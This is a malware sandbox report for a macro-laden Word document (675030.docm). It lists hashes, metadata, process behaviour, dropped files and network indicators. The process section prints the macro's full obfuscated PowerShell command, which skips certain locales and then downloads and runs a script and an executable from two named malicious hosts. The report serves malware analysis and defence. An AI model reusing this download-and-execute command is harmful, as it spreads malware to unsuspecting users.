analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

675030.docm

Full analysis: https://app.any.run/tasks/99259107-4158-47e5-a04d-c92436925eba
Verdict: Malicious activity
Analysis date: June 19, 2019, 08:59:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-1
maldoc-4
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

42EFF1C19D5941BF5F2D7ECFB6D7A3C5

SHA1:

A0968131ABF0ABDE51F5B70385BABE6E58B6C44D

SHA256:

6354D6716654177EBF8F705971EEE33E37280734EB2F3F3D0A9CDBAB95AB22BB

SSDEEP:

1536:q1bryaP+7C3hskRSSuclIyTPHkDD+WZbQ8NGVp3:q1bOasIRSSuclIyoDDI6G3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 584)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 584)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2136)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 584)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 584)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2a6675f6
ZipCompressedSize: 445
ZipUncompressedSize: 1900
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: VPS2day
Description: -

XML

Keywords: -
LastModifiedBy: VPS2day
RevisionNumber: 31
CreateDate: 2019:03:27 00:11:00Z
ModifyDate: 2019:03:28 02:13:00Z
Template: Normal.dotm
TotalEditTime: 1.8 hours
Pages: 1
Words: -
Characters: 3
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: VPS2day
LinksUpToDate: No
CharactersWithSpaces: 3
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
584"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\675030.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2136"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; };$ccbwfbe = [System.IO.Path]::GetTempPath();$zgwdu = Join-Path $ccbwfbe 'Dke.exe';$ztudg='http://cloud.chachobills.com/501?jdihwj';$cigch = Join-Path $ccbwfbe 'SearchI32.js';$bejtsfe='http://ami.regroups.net/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=pecdoc';$bxeziu='(N68RRtCyew-Object 68RRtCyNet68RRtCy.WebC68RRtCylie68RRtCynt).D68RRtCyown68RRtCyload68RRtCyF68RRtCyile($bej68RRtCytsf68RRtCye,$c68RRtCyigch)68RRtCy;' -replace '68RRtCy','';iex $bxeziu;Start-Process $cigch;$zsbevy='(NRR2vERtew-Object RR2vERtNRR2vERteRR2vERtt.WebClieRR2vERtntRR2vERt).DowRR2vERtnloadFiRR2vERtlRR2vERte($zRR2vERttuRR2vERtdgRR2vERt,$RR2vERtzgRR2vERtwRR2vERtdu);' -replace 'RR2vERt','';iex $zsbevy;Start-Process $zgwdu;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 428
Read events
749
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
584WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR11FA.tmp.cvr
MD5:
SHA256:
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LERXRYOZKIP05LHNX21Y.temp
MD5:
SHA256:
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121e3e.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
584WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\675030.docm.LNKlnk
MD5:BE28F451D3407C85F716D753DEB3D8FC
SHA256:C99E025DC75F6FC4950B317EB5698E8E2743F2CC0FCB5B3AB7B85E7CD8CE0C76
584WINWORD.EXEC:\Users\admin\Desktop\~$675030.docmpgc
MD5:8017E57F7F74B4972588D1A99AEA6749
SHA256:087E2AAE9B27B115352326952079908B86A23DAB2CDC56CE794EFEC2CDEDB07B
584WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D177531F4B3098B3B691EDAA702892BC
SHA256:8E0DB2A1DB745D99DE193E8A55F1FD719D67DFF6B94C239636EFD8D97611CDC8
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
584WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:3D0124F59D52F9207C85F0C63A6B1FDF
SHA256:9C808B2D68CDE0D511B2C8FFEAC874305BDB7470EE7C4D237773EB5DC661982D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2136
powershell.exe
GET
185.158.250.114:80
http://ami.regroups.net/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=pecdoc
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2136
powershell.exe
185.158.250.114:80
ami.regroups.net
M247 Ltd
NL
malicious

DNS requests

Domain
IP
Reputation
ami.regroups.net
  • 185.158.250.114
malicious

Threats

No threats detected
No debug info